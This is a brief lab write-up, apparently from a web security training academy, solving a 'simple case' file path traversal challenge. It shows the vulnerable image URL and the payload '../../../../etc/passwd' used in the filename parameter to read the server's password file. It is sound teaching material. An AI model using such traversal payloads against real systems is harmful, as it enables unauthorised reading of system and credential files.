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## **File path traversal, simple case**

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1. This lab contains a path traversal vulnerability in the display of product images.

2. I opened a product image in new tab and the URL becomes:

`https://0a91007904daf8d78101bb9f008300ea.web-security-academy.net/image?filename=44.jpg`

3. I tried to inject my payload into filename parameter like this:

`https://0a91007904daf8d78101bb9f008300ea.web-security-academy.net/image?filename=/etc/passwd`

but the response is “No such file”.

4. I tried to traverse in file system using ‘..’ till I found different response retrieved when I inject this payload :

`../../../../etc/passwd`

5. And here we go, the lab solved.

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LAB Solved



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